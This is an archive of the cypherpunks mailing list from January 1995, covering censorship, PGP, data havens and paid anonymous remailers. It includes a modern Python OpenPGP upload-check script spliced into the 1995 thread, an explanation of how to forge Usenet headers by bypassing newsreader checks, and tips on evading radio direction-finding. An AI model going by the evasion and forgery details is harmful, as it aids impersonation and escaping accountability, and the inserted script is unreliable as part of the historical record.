provides could meet that need without compromising end user privacy. Slowly I believe that Prodigy, AOL, etc., are getting this message, that it costs more to censor than not to. Reading of the week: "Defending Pornography", by the head of the ACLU (yes a woman) who argues that the fight against censorship is equivalent to the fight for women's rights, and historically has always had the same enemies. Kind words on the jacket from Friedan and other mainstream feminists.
> > as for PGP, this is an individual thing....I'm sure mike > > has no such objections...i know here at MindVox we > > don't...in fact, we installed it for the users > > Many BBS Sysops forbid PGP and kick users off their systems who I can't speak to the paranoia of garage system operators but: > use it. They cite fears of encrypted illegal porn and credit > card numbers passing through their systems, and potential legal > liability. We work with a lot of large corporate clients using the internet. We have recommended PGP as a means of securing privacy for all corporate communications (note I don't use it from this site as I don't download all mail from here before reading it, a GUI PGP that was usable would go a long way to overcoming resistance) and deal only with BBS operators who fully support user privacy. As I suggest, we have recommended strongly against investigating the contents of mail etc., and have been backed by the lawyers of these organizations who see a nightmare of legal liability even in the *ability* to look. (When does the ability to look become an obligation to record? Go ask your service provider!) It seems to me that, although there have been some misguided prosecutions with serious impact on the livelihoods of some small operators, the defense that the operators did not know what was moving through their site has held up. Criminal liability hinges on knowledge of the act - you cannot be held criminally liable unless you knew what was going on... period. Exceptions to that ('guilty until proven innocent' doctrine that blames the publisher and forces them also to be a censor) are offensive to the principles of both the law and liberalism. I would cite broadcasting law as an example of such an abusive body of law, and note that it was written entirely in this century. The 'common carrier' status is not a silver bullet, it obligates carriers to co-operate with authorities to maintain that status, as it is specially granted. 
It is actually better to let it evolve by precedent, a 'de facto' common carrier defense, as that way it cannot be withdrawn by a government without special legislation that itself may be overturned by the courts (in constitutional democracies). In other words, keep on using PGP, ditch providers who forbid it, and recommend it to every company you can. Once it becomes clear to Ford and Kraft and GM that a decision to hold a BBS operator responsible for traffic that moved through his system without his intervention, is also likely to deem *them* responsible for employees (and suppliers!) once they have established internally a comfortable precedent of just leaving the mail alone... very expensive and disruptive to overturn... you can be damn sure that some serious campaign contributions will swing over to the privacy advocates. I make these assumptions: that corporate America, as commercial entities, have no interest in knowing about anything that is not directly related to the making of money. It does not want its business complicated by the necessity to become a censor of employee discussions. Piss tests etc. were an example of DoD over-control forcibly imposed on the private sector... with predictable results like the Intel Pentagronk (who ever heard of a serious system being built entirely without benefit of psychoactives?) With DoD spending disappearing, the military-industrial complex shrinking, this economic influence is reduced and we get more overt legislative attempts to exert control like the Clipper, motivated by 'civilian' concerns like 'kiddie porn' (gee Japan has no such laws and it hasn't collapsed yet, has lower incidence of child molestation too...) and 'violent porn' (same story, you can get it in Denmark and they have less rape than here...) and 'stolen goods' (which can be moved around easily enough by a hundred other means). In other words, the same lame excuses that politicians use every time they want to control people. 
But I don't think business is with the program, I think corporations only react to fear of liability etc. (which is kept heightened by governments with their own agenda) which can be reduced by education and measured by intelligent risk analysis. In my opinion, as the architect of several risk management systems, the latter demonstrates that the danger is less than 'most BBS operators' think, and it arises from different factors than they think, to wit: If a small service provider is prosecuted for moving alt.binaries.snuff through his system, it is not because he carries it: so do 500 other service providers, and they can't prosecute them all. It is because he was careless enough to indicate in non-PGP-encrypted email that he was intending to make a political donation to the prosecutor's opponent. Barring a nationwide crackdown, where the initial prosecution is always carefully chosen for minimum public sympathy, these random prosecutions are going to be motivated by the petty whims of cops and bureaucrats. I see no reason why one would leave one's opinions open to them to read. All that can do is make you a target, and who needs to be a target ? That said, I can understand their fear. If I were operating an internet service today, I doubt I would have posted this to cypherpunks (which I read primarily to protect my own privacy, that of my clients, and advise them on effective means of privacy protection). Now I'm probably on an NSA list somewhere... good thing I'm up here in Canada...! Craig Hubley Business that runs on knowledge Craig Hubley & Associates needs software that runs on the Web craig at passport.ca 416-778-6136 416-778-1965 FAX From carolb at barton.spring.com Tue Jan 10 01:16:36 1995 From: carolb at barton.spring.com (carolb) Date: Tue, 10 Jan 95 01:16:36 PST Subject: PRESS RELEASE - RSA Licenses Co In-Reply-To: Message-ID: Thanks, that was nice & handy, & scary. 
Registered Bellcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." The TS NET REVOKED PGP KEY NO.0C91594D carolb at spring.com carolann at mm.com ************************************************************************ COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM From skaplin at mirage.skypoint.com Tue Jan 10 03:24:11 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Tue, 10 Jan 95 03:24:11 PST Subject: Julf gets some negitive press!!! Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I found this surfing USENET. Very interesting... From: cmfaltz at panix.com (Titania) Subject: SIEGAL STRIKES AGAIN -- HEADS UP, FOLKS; CENSORS GETTING READY Date: 5 Jan 1995 09:28:40 -0500 Organization: The Q Continuum Lines: 112 Message-ID: <3egvmo$lfg at panix.com> NNTP-Posting-Host: panix.com Check the blurb at the end of this reprint from the San Francisco Chronicle -- bitch Siegel is complaining about net hoods again, while supplementing her income providing a how-to book for those hoods -- oh, she would say her book is informative, bringing Net abuses and scams to the public knowledge, but human nature being what it is, how much do you wanna bet scum have been buying up her little tome for ideas? Check 'er out, everyone -- she's the face of the enemy -- get ready. Reprinted from Monday's SF Chronicle *Anarchy, Chaos on the Internet Must End* Martha S. Siegel Elections are over, and, for better or worse, recognized leadership is installed and working in most places. Yet, in Cyberspace, the electronic world dominated by the much vaunted Internet, there is not much order. This huge international computer web tying together about 30 million people is governed by no one. What an amazing state of affairs. The most powerful communication medium ever invented is being left to the equivalent of mob rule.
Last year was the year of the Internet in the media. Clearly it is now in the mainstream. Nonetheless, judging by what you read or hear, the key question of who runs it is not even an issue. It is more fun, after all, to contemplate shopping in an electronic mall or how to order a pizza through a modem. No matter, if you scratch the surface of this big, happy party, the need for firm direction is all too obvious. Also reported in the press is an expanding array of Internet problems. Unregulated broadcasting of sexually explicit material that is readily available to children usually heads the list, but on-line sexual harassment, profanity, defamation, forgery and fraud run close seconds. The secretiveness that computer communications allows is a special reason why abuse is easy. National and personal security are serious considerations when anyone can, with complete anonymity, send encrypted information worldwide via the Internet. Such problems are further exacerbated by a computer in Finland called the Anonymous Server, which exists for the sole purpose of laundering computer messages, much like dirty money is laundered through small island nations. Consequently, if you want to, say, threaten someone with death, your risk of retribution is small, courtesy of the Anonymous Server. Nowhere are Cyberspace difficulties more evident than in the inevitable swing toward Internet commercialization. The widely reported turf war rages on between academic factions that controlled Internet before it went public and business newcomers who now want to access its huge audience. Electronic attacks on business people by means ranging from computer insults, called flames, to assorted forms of electronic vandalism, persist uncontrolled. Worst of all are the "canceller robots," computer programs meant to erase the communications of anyone the hackers who usually launch them want to silence. These self-styled vigilantes routinely challenge free speech in Cyberspace unabated.
Internet access providers, companies that connect people to the Internet for a profit, likewise assume the role of censors, arbitrarily closing accounts of those whom they disapprove. Given its international nature, one obvious way to bring much needed order to the Internet is through diplomacy. The United States should lead in this. A good beginning might be to urge the Finnish government to deactivate the Anonymous Server. Diplomacy could also help to establish an international standard of recognizing laws existing at the point of origin as controlling the message sender. When conflicts arise, governmental diplomacy should again be the answer, just as it is with other trade and communications issues. Next, laws already regulating behavior in the real world should be applied to Cyberspace. This is already taking place on a case-by-case basis, but the process is too slow. The Supreme Court should act to create a precedent stating that crime is crime, even when the criminal instrument is a computer keyboard. In the United States, legislation should be passed making Internet providers common carriers. This will get them out of the business of censorship and under the guiding hand of the Federal Communications Commission. People need safety and order in Cyberspace just as they do in their homes and on the streets. The current state of the Internet makes it clear that anarchy isn't working. If recognized governments don't find a way to bring order to the growing and changing Internet, chaos may soon dictate that the party is over. ** Martha S.
Siegel is the author of "How to Make a Fortune on the Information Superhighway" and CEO of Cybersell in Scottsdale, Arizona In any case, the San Francisco Chronicle may be reached at: Letters to the Editor, San Francisco Chronicle 901 Mission Street San Francisco, Ca 94103 or you can fax a letter at (415) 512-8196 - -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== Anyone who hates Dogs and Kids Can't be All Bad. -- W. C. Fields -----BEGIN PGP SIGNATURE----- Version: 2.6.2 -----END PGP SIGNATURE----- From root at einstein.ssz.com Tue Jan 10 04:07:20 1995 From: root at einstein.ssz.com (root) Date: Tue, 10 Jan 95 04:07:20 PST Subject: Pornography, What is it? In-Reply-To: <199501100754.BAA23939@pentagon.io.com> Message-ID: <199501101202.GAA00328@einstein.ssz.com> > [...] > > > What you define as pornography doesn't mean shit, it's what the media and > > > journalists and fundies etc.. decide is pornographic that you gotta watch > > > out for. [...] > > > > > I am well aware that what I personally consider pornography carries little > > weight. > > One minor nit. Pornography is not illegal, obscenity is what is regulated.
> The difference between the two is the fine line upon which we tread. > If this is so then everything I have read or seen misses this minor point completely. Every press release, speech, etc. that I see uses the term pornography, not obscenity. TV preachers, news anchors, newspapers, DA's, etc. consistently use the term pornography. The state of Oregon specifically legalized pornography, not obscenity. I think from a legal standpoint there is little difference between the two. > > As to data havens being dangerous to run...I don't know. At the recent > > HoHoCon there was a long discussion 'bout networks hidden within networks > > that was very intriguing. If Doug Barnes is reading this he may be > > willing to reiterate some of the talk. I do know that at the moment my > > That was my talk, and if I ever get around to it I will be putting my notes > and design details for underground internetworking up on the web. These > notes include the slides from the talk and the technical notes relating to > this issue... > Sorry for the slip. From avi at clas.ufl.edu Tue Jan 10 06:18:11 1995 From: avi at clas.ufl.edu (Avi Harris Baumstein) Date: Tue, 10 Jan 95 06:18:11 PST Subject: Data Haven problems In-Reply-To: <199501100125.TAA29250@pentagon.io.com> Message-ID: <199501101418.JAA08782@cutter.clas.ufl.edu> dfloyd at io.com writes: >My problem is not that people will bitch about my DH. My problem will >be arfholes or yellow journalists uploading K*dd*e p**n to my DH, then >making a long report how I cater to p*dofiles and other evil denizens >that pop from time to time. Then, I get the police knocking at my >door, asking me to come to Club Fed for a looooonnnggg vacation. well i remember a suggestion a while back to only accept encrypted files.
i don't remember who made the suggestion, but this seems like a good idea for several reasons: 1) most journalists won't know how to encrypt their files (ok, this is an admittedly short-term advantage, as journalists get smarter) 2) you will have no idea *what* is stored, and absolutely no way of finding out, even if you wanted to. you should advertise this feature widely. 3) it will help promote the use of crypto, as those who want to use the DH will have to have a way to encrypt their files. and charging, even an extremely minimal fee, will help to reduce wanton usage. but then you get into the whole electronic payment infrastructure problem again... -avi From bdolan at well.sf.ca.us Tue Jan 10 06:42:27 1995 From: bdolan at well.sf.ca.us (Brad Dolan) Date: Tue, 10 Jan 95 06:42:27 PST Subject: Response to CBS News "drive-by" attack on the internet Message-ID: <199501101442.GAA21852@well.sf.ca.us> January 10, 1995 Eric Ober President, CBS News 524 W. 57th Street New York, NY 10019 Dear Mr. Ober: In its 1/9/95 evening news broadcast, CBS aired a segment presenting a number of people who argued that the content of school libraries, written communications, and electronic communications should be censored for the common good. Since CBS did not present anyone with an opposing point of view, I assume the position presented is believed by CBS to be correct and not controversial. At first I was concerned about your network's apparent lack of support of first amendment rights to freedom of speech and of the press. Then I realized that these freedoms are only to discuss topics which could not result in physical or moral harm to anyone. I have some friends who share your concerns. They have been trying for years to reduce availability of morally dangerous materials like _The_Catcher_In_The_Rye_ and _Heather_Has_Two_Mommies_. They will be so excited to hear that you are now on their side. 
Sincerely,

Brad Dolan
bdolan at well.sf.ca.us

From storm at marlin.ssnet.com Tue Jan 10 07:37:43 1995
From: storm at marlin.ssnet.com (Don Melvin)
Date: Tue, 10 Jan 95 07:37:43 PST
Subject: Rumored CBS "hit" on internet coming
In-Reply-To: <199501091955.LAA07671@netcom18.netcom.com>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article <199501091955.LAA07671 at netcom18.netcom.com>, you wrote:
>
> Argghh!! When Connie interviewed me last week, she said I could
> _whisper_ some dark uses to her and it would just be between the two
> of us!
>
> Life's a bitch, and so is Connie.

I believe the current PinC expression should be Life's a Hillary, and so is Connie

- --
America - a country so rich and so strong we can reward the lazy and punish the productive and still survive (so far)

Don Melvin storm at ssnet.com finger for PGP key.

From nsb at nsb.fv.com Tue Jan 10 07:59:27 1995
From: nsb at nsb.fv.com (Nathaniel Borenstein)
Date: Tue, 10 Jan 95 07:59:27 PST
Subject: for-pay remailers and FV
In-Reply-To: <21043.789692792.1@nsb.fv.com>
Message-ID:

Excerpts from fv: 9-Jan-95 Re: for-pay remailers and FV db at Tadpole.COM (2073*)

> Also, there is no reason on earth to take FV for payment under
> such a scheme,

No reason on Earth? Try any of the following:

1. You can actually get paid, in real money, using a system that is operating NOW.

2. It requires no special software for the user of the remailer service, thus preserving a very positive feature of most of today's anonymous remailers.

3. You don't need to have a credit card merchant account (and the technical arrangements for using it) in order to run a remailer service.

There are more, but those are probably the top three.
> I don't see any reason to get FV involved, unless one were so lame
> as to be unable to get signed up directly with the credit card
> companies as a merchant -- a process of appropriate complexity
> to indicate the possession of at least one (1) clue, which is prob.
> desirable in someone who's going to be handling remailer finances

Well, I could be wrong, but from the above paragraph I can only infer that you've never actually tried to set yourself up as a merchant.

The hardest part is getting approved for a merchant account. Unless you already have an established business or money in the bank, this will *probably* be a showstopper if you want to set up a remailer-for-pay service. Getting a merchant account is never trivial, and getting one in a whole new industry is VERY hard.

Once you have a merchant account, establishing the right technical setup to do the actual authorization and purchases is not rocket science, but it certainly requires more than "1 clue" -- in particular, it typically requires hooking up some special hardware, installing and configuring some new software, and some serious thought about the implications for your system's security. None of this is needed if you use FV.

Also, as Paul pointed out, the requirement for reversibility applies to ANY credit-card-based service, not just FV. This is NOT an option, it is required by law (reg Z).

Excerpts from fv: 10-Jan-95 Re: for-pay remailers and FV Hal at shell.portal.com (2603)

> Perhaps you could charge some small amount for them, but require VISA
> payment, and check the names on the VISA cards. (This doesn't hurt
> anonymity when the tokens are actually used because of the blinding.) To
> get multiple tokens a person would have to commit some serious real world
> name trickery, a considerably higher barrier than making up a pseudonym
> on the net.

This is workable. It also reinvents a big chunk of what FV does, if you do it yourself.
-- NB

From daleh at ix.netcom.com Tue Jan 10 08:27:05 1995
From: daleh at ix.netcom.com (Dale Harrison AEGIS)
Date: Tue, 10 Jan 95 08:27:05 PST
Subject: DataHavens
Message-ID: <199501101626.IAA19511@ix3.ix.netcom.com>

If one wonders what sort of physical threat an operator of a datahaven could potentially face, then today's (01/10/95) Wall Street Journal editorial is must reading. It's on the Op-Ed page (page A20) and is titled: "No Accountability at the FBI". It discusses the Randy Weaver siege in 1992 and the subsequent investigation and whitewash that followed. It's scary stuff!

From rogaski at phobos.lib.iup.edu Tue Jan 10 08:29:28 1995
From: rogaski at phobos.lib.iup.edu (Mark Rogaski)
Date: Tue, 10 Jan 95 08:29:28 PST
Subject: HTTP and ID Verification
Message-ID: <199501101629.LAA05969@phobos.lib.iup.edu>

-----BEGIN PGP SIGNED MESSAGE-----

Can anyone tell me what the URL for the site that displays all the identifying info it gets when you request it is?

- -----
Doc doc at phobos.lib.iup.edu
aka Mark Rogaski http://www.lib.iup.edu/~rogaski/
Disclaimer: You would probably be hard-pressed to find ANYONE who agrees with me, much less my university or employer...
[finger fllevta at oak.grove.iup.edu for PGP Public Key and Geek Code v2.1]

From nelson at crynwr.com Tue Jan 10 08:30:24 1995
From: nelson at crynwr.com (Russell Nelson)
Date: Tue, 10 Jan 95 08:30:24 PST
Subject: for-pay remailers and FV
In-Reply-To:
Message-ID:

   Date: Tue, 10 Jan 1995 10:57:56 -0500 (EST)
   From: Nathaniel Borenstein

   The hardest part is getting approved for a merchant account.

I've tried. Nathan is right.
   Also, as Paul pointed out, the requirement for reversibility applies to ANY credit-card-based service, not just FV. This is NOT an option, it is required by law (reg Z).

But if you sell services or information, this is not a really big problem. You just say "fuck it, I got screwed", and you reverse the charges.

And as for anonymity/privacy, if the business is doing a lot of other transactions, and the remailer ones are mixed in, then who's to say who's who? Maybe it's time to remind people that there is no such thing as perfect security, only varying degrees of such.

--
-russ http://www.crynwr.com/crynwr/nelson.html
Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?

From nelson at crynwr.com Tue Jan 10 08:34:48 1995
From: nelson at crynwr.com (Russell Nelson)
Date: Tue, 10 Jan 95 08:34:48 PST
Subject: DH testing
Message-ID:

A DataHaven is only as good as it's been tested. You could pay for a tiger team to attack it, but why bother? Just take some nudie pictures of a girl >=18 years old who looks <18 years old, announce publicly that you have kiddie porn for sale, sit back and let the FBI test your DH for free. Be sure to charge enough for your eventual legal defense...

--
-russ http://www.crynwr.com/crynwr/nelson.html
Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?

From nelson at crynwr.com Tue Jan 10 08:42:02 1995
From: nelson at crynwr.com (Russell Nelson)
Date: Tue, 10 Jan 95 08:42:02 PST
Subject: "safe" Internet access
Message-ID:

If you want to access the Internet in a way that doesn't reveal your physical location (much), buy access from Metricom. They sell Internet access via radios.
A small part-15 (900Mhz) $500 radio modem is needed, plus a few dozen bucks/month (thereabouts). If you use a yagi antenna, that will reduce your emissions to mostly one direction. If you're in line-of-sight with one of their poletops, you can point a telescope in that direction, and transmit only when you *don't* see a truck bristling with antennas.

Every radio has a serial number, and they record who's got what, so they could cut you off much, much easier than catching you. For more information, see .

Same thing can be done with radiomail, but the speed is slower and the radios and service are more expensive. And, they can still cut you off.

Of course, part-time connectivity is problematic, because you need to receive mail at all times. Of course, you could use a mail hub in a "safe" country, but then you're tied to a government again.

--
-russ http://www.crynwr.com/crynwr/nelson.html
Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?

From mpd at netcom.com Tue Jan 10 08:44:22 1995
From: mpd at netcom.com (Mike Duvos)
Date: Tue, 10 Jan 95 08:44:22 PST
Subject: Fwd: Re: netcom discussion in news.admin.misc
In-Reply-To: <199501100351.TAA05721@ix3.ix.netcom.com>
Message-ID: <199501101633.IAA07416@netcom19.netcom.com>

johndix at ix.netcom.com (John Dix) writes:

> I've mentioned to Netnews that a good first step would be to
> make it harder to forge messages by changing the news
> software to no longer accept a user-supplied "Sender:" line
> in the article header, and he has agreed. However, I fail
> to understand just *what* is taking so long to make this
> (much needed) change.

The problem here is that the news transport mechanism is not particularly resistant to arbitrary text being posted by a user.
Newsreaders can check for forged "From:" or "Sender:" lines, but newsreaders then call shell scripts like inews and injnews to process their material. Users can call these scripts directly and bypass any checks by the newsreader. None of this requires any special privs, and only the lowest level of the news transport mechanism, relaynews, requires set-user-id netnews to function.

The latest version of Tin does check for forged "From:" lines, but the version Netcom runs allows anything to be posted.

Fudging the lower levels of the news transport mechanism to check "From:" and "Sender:" lines can mess up other things, since processes may need to inject news into the news stream which they themselves did not author.

One solution to the problem is to have a secure level of the news transport mechanism add an "Originator:" line to every message which it handles. This will identify users attempting forgeries, and will not require munging of an existing header line.

--
Mike Duvos $ PGP 2.6 Public Key available $
mpd at netcom.com $ via Finger. $

From mpd at netcom.com Tue Jan 10 08:47:54 1995
From: mpd at netcom.com (Mike Duvos)
Date: Tue, 10 Jan 95 08:47:54 PST
Subject: Julf gets some negitive press!!!
In-Reply-To:
Message-ID: <199501101646.IAA09037@netcom19.netcom.com>

skaplin at mirage.skypoint.com (Samuel Kaplin) writes:

> bitch Siegel is complaining about net hoods again, ...

> Such problems are further exacerbated by a computer in
> Finland called the Anonymous Server, which exists for the
> sole purpose of laundering computer messages, much like
> dirty money is laundered through small island nations.

I predicted a while back, that when the time came for a serious attack by authority types on anonymous remailers, we would see the term "message laundering" suddenly spring into the public lexicon.

> Consequently, if you want to, say, threaten someone with
> death, your risk of retribution is small, courtesy of the
> Anonymous Server.
Well, I certainly wouldn't post death threats through Penet. At the very least, it would threaten the existence of the server, which is a valuable net.resource, and cause me to receive nasty mail from Julf. I think Bitch Siegel exaggerates the potential danger of this particular system.

--
Mike Duvos $ PGP 2.6 Public Key available $
mpd at netcom.com $ via Finger. $

From nesta at nesta.pr.mcs.net Tue Jan 10 08:51:29 1995
From: nesta at nesta.pr.mcs.net (Nesta Stubbs)
Date: Tue, 10 Jan 95 08:51:29 PST
Subject: Data Haven problems
In-Reply-To: <199501101418.JAA08782@cutter.clas.ufl.edu>
Message-ID:

On Tue, 10 Jan 1995, Avi Harris Baumstein wrote:

> dfloyd at io.com writes:
>
> >My problem is not that people will bitch about my DH. My problem will
> >be arfholes or yellow journalists uploading K*dd*e p**n to my DH, then
> >making a long report how I cater to p*dofiles and other evil denizens
> >that pop from time to time. Then, I get the police knocking at my
> >door, asking me to come to Club Fed for a looooonnnggg vacation.
>
> well i remember a suggestion a while back to only accept encrypted
> files. i don't remember who made the suggestion, but this seems like a
> good idea for several reasons:
>

I like this too, it keeps the data safe not only in transit, but also on the site itself. So I don't have to re-encrypt files, they are already crypted, and signed (another good bonus) by the sender or account holder.

> 2) you will have no idea *what* is stored, and absolutely no way of
> finding out, even if you wanted to. you should advertise this feature
> widely.

depends on how it is encrypted, if they encrypt it to the datahaven, using your public key, that argument won't work, BUT if they are using it as an anon drop box, then they can encrypt it to another public key of the recipient (an anon key of course) and you would never be able to read it. This is a good feature of a data-haven, one that may be able to produce profit in the future if that is a motive.
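
The distinction drawn in the message above (a file encrypted to the haven's own key versus one encrypted only to a third party's key) can be checked at upload time from the OpenPGP packet headers alone. The following is an added example, not part of the original thread: `check_upload`, the policy it enforces, and every key ID and sample packet are assumptions constructed for illustration.

```python
"""Intake check for a store that accepts only OpenPGP-encrypted uploads (added example)."""
import base64

PKESK, SYM_ENC, SEIPD = 1, 9, 18   # packet tags: session key, encrypted data (two kinds)
WILDCARD = "0" * 16                # key ID used when the recipient is hidden


def dearmor(blob: bytes) -> bytes:
    """Return raw packet bytes, decoding ASCII armor if present (CRC24 not verified)."""
    if not blob.lstrip().startswith(b"-----BEGIN PGP MESSAGE-----"):
        return blob
    lines = [line.strip() for line in blob.strip().splitlines()]
    start = lines.index(b"") + 1   # a blank line ends the armor headers
    body = [line for line in lines[start:-1] if not line.startswith(b"=")]
    return base64.b64decode(b"".join(body))


def read_header(data: bytes, pos: int):
    """Parse the packet header at pos; return (tag, body_start, body_len or None)."""
    ctb = data[pos]
    if not ctb & 0x80:
        raise ValueError("not an OpenPGP packet")
    if ctb & 0x40:                                   # new-format header
        tag, first = ctb & 0x3F, data[pos + 1]
        if first < 192:
            return tag, pos + 2, first
        if first < 224:
            return tag, pos + 3, ((first - 192) << 8) + data[pos + 2] + 192
        if first == 255:
            return tag, pos + 6, int.from_bytes(data[pos + 2:pos + 6], "big")
        return tag, pos + 2, None                    # partial body length
    tag, ltype = (ctb >> 2) & 0x0F, ctb & 0x03       # old-format header (PGP 2.x)
    if ltype == 3:
        return tag, pos + 1, None                    # indeterminate length
    width = 1 << ltype                               # 1, 2 or 4 length octets
    return tag, pos + 1 + width, int.from_bytes(data[pos + 1:pos + 1 + width], "big")


def check_upload(blob: bytes, operator_key_id: str):
    """Return (accepted, reason, recipient_key_ids) for one uploaded file."""
    recipients = []
    try:
        data, pos = dearmor(blob), 0
        while True:
            tag, start, length = read_header(data, pos)
            if tag in (SYM_ENC, SEIPD):
                break                                # reached the ciphertext packet
            if tag != PKESK or length is None:
                return False, f"packet tag {tag} before any ciphertext", recipients
            body = data[start:start + length]
            if len(body) < length or length < 10 or body[0] not in (2, 3):
                return False, "malformed session-key packet", recipients
            recipients.append(body[1:9].hex().upper())   # 8-octet recipient key ID
            pos = start + length
    except (ValueError, IndexError):
        return False, "truncated or not an OpenPGP message", recipients
    if operator_key_id.upper() in recipients:
        return False, "encrypted to the operator's own key", recipients
    if WILDCARD in recipients:
        return False, "hidden recipient, cannot rule out the operator's key", recipients
    if not recipients:
        return True, "conventionally encrypted, no recipient key", recipients
    return True, "encrypted to third-party keys only", recipients


# --- constructed sample data (key IDs and packet bodies are made up) ---
OPERATOR_KEY = "1122334455667788"
RECIPIENT_KEY = "A1B2C3D4E5F60718"


def sample_pkesk(key_id: str, old_format: bool = True) -> bytes:
    """Build a version-3 session-key packet with a dummy MPI in place of real RSA data."""
    body = bytes([3]) + bytes.fromhex(key_id) + bytes([1]) + b"\x00\x08\xaa"
    return bytes([0x84 if old_format else 0xC1, len(body)]) + body


CIPHERTEXT = b"\xa4\x04\xde\xad\xbe\xef"             # old-format tag 9, 4 dummy octets
TO_RECIPIENT = sample_pkesk(RECIPIENT_KEY) + CIPHERTEXT
TO_OPERATOR = sample_pkesk(OPERATOR_KEY, old_format=False) + CIPHERTEXT
TO_BOTH = sample_pkesk(RECIPIENT_KEY) + sample_pkesk(OPERATOR_KEY) + CIPHERTEXT
ARMORED = (b"-----BEGIN PGP MESSAGE-----\nVersion: 2.6.2\n\n"
           + base64.b64encode(TO_RECIPIENT) + b"\n=AAAA\n-----END PGP MESSAGE-----\n")
LITERAL = b"\xac\x05b\x00hi!"                        # tag 11: unencrypted literal data

if __name__ == "__main__":
    for name, blob in [("to recipient", TO_RECIPIENT), ("armored", ARMORED),
                       ("to operator", TO_OPERATOR), ("to both", TO_BOTH),
                       ("literal packet", LITERAL), ("plain text", b"hello world")]:
        print(f"{name:15}", check_upload(blob, OPERATOR_KEY))
```

The check reads packet framing only; it cannot prove that the body of the data packet is real ciphertext.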
From RGRIFFITH at sfasu.edu Tue Jan 10 08:52:58 1995
From: RGRIFFITH at sfasu.edu (RGRIFFITH at sfasu.edu)
Date: Tue, 10 Jan 95 08:52:58 PST
Subject: procmail: another question
Message-ID: <01HLOG4V1I1E00106V@TITAN.SFASU.EDU>

Please excuse my ignorance, but will procmail run under DOS? Will it download mail from a PopMail server?

From anonymous-remailer at shell.portal.com Tue Jan 10 09:33:17 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 10 Jan 95 09:33:17 PST
Subject: Anarcho-Cap - Newt and Gorby?
Message-ID: <199501101733.JAA21222@jobe.shell.portal.com>

## From: sherbock at remailer.net

-----BEGIN PGP SIGNED MESSAGE-----

Crypto-anarchy, many-to-many communications, inter-national/cultural communications, bandwidth price plummet, computer ubiquity, philosophical/ideological evangelism, freedom of speech/trade/association and other factors talked about on this list are together heralding huge transformations.

With this as background together with the statement that I am somewhat of a "Frissell/Sandfort Optimist," let me present a short essay and ask a single political question.

I want to propose that a change to more of a Snow Crash society with anarcho-capitalism as the norm is not necessarily being _caused_ by pressures listed above, but, rather, fit a grander historical destiny. What we are seeing and will see in the information age has been bound to happen all along. It is an inevitable follow-on phase to our industrial age.

One way to view our (Cypherpunks) work is "lead, follow or get out of the way." What's happening is going to happen. I just want to be in the center of it! (I could write much more in support of this. Read Gilder, Rees-Mogg, etc. and much of the techno Sci-Fi suggested by Cypherpunks.)

Hindsight is 20/20. Many experts have analyzed the collapse of the USSR. Many are quick to claim that the dissolution was inevitable, historical, even.
Consider the possibility that the dissolution of large, centralized federal republics is also inevitable. (The Frissell/Sandfort Optimists have been arguing this exact point.)

As an interesting specific, consider parallels in the roles of former Soviet leader Mikhail Gorbachev and the U.S. House Speaker Newt Gingrich.

Gorbachev, by self-proclamation, was a communist first and foremost. He was in no way a destructionist. In fact, it can be argued that he never intended to weaken the central power of the Supreme Soviet. He introduced liberalization reform (perestroika?) with the intent only of heading off the foreboding economic collapse of his State. Gorbachev's reforms were little baby walking steps in a direction that the Bear already was poised to _run_.

Mr. Gingrich is a REPUBLICan. From what I can see, he loves the Constitutional government process of the United States. His proclaimed intentions are for downsizing and deregulation. However, he does not seem to desire the dissolution of federal, central government. He has not openly claimed to be libertarian or anarcho-capitalistic. :)

Will Newt's deregulatory reforms be baby walking steps in the direction Uncle Sam (and the world) is already poised to _run_?

G.
del Sherbock

From eric at remailer.net Tue Jan 10 10:11:37 1995
From: eric at remailer.net (Eric Hughes)
Date: Tue, 10 Jan 95 10:11:37 PST
Subject: RSA Licenses Commercial Distribution Rights to RSAREF (URLs to PressRelease)
Message-ID: <199501101810.KAA26946@largo.remailer.net>

I've been waiting for this, for oh, about two years now.

Eric
-----------------------------------------------------------------------------

RSA Licenses Commercial Distribution Rights to RSAREF
=====================================================

RSA announces that it is licensing commercial distribution rights of its RSAREF software to Consensus Development, allowing for implementation of commercial Privacy Enhanced Mail (PEM) applications.

Press Release
--------------

REDWOOD SHORES, CALIFORNIA--JANUARY 9, 1995--RSA Data Security, Inc. and Consensus Development Corporation jointly announce today at the RSA Data Security Conference that Consensus Development is licensing the commercial distribution rights of RSAREF from RSA Data Security.

RSAREF (pronounced "R.S.A. reff") is short for "RSA reference implementation" and is a cryptography source code toolkit designed to allow developers to create PEM (Privacy-Enhanced Mail) software and other encryption/authentication tools. Until now, RSAREF has been an unsupported RSA product approved for use only as part of freeware and not-for-profit software applications.
Consensus Development will now be able to market and license RSAREF to commercial software developers, and provide software support and future enhancements to the RSAREF source code library.

(continued in full text press release...)

Full Text
---------

A World-Wide-Web/Mosaic page for this press release can be found at:

A digitally signed text copy of this press release can be found at:

Discussion/Announcement List
----------------------------

Consensus Development will be creating an email discussion list for software developers interested in RSAREF. To join the discussion, send a message to with the body of the message requesting "subscribe RSAREF-DEV-L firstname lastname".

From adam at bwh.harvard.edu Tue Jan 10 10:19:52 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Tue, 10 Jan 95 10:19:52 PST
Subject: RSA Licenses Commercial Distribution Rights to RSAREF (URLs to Press
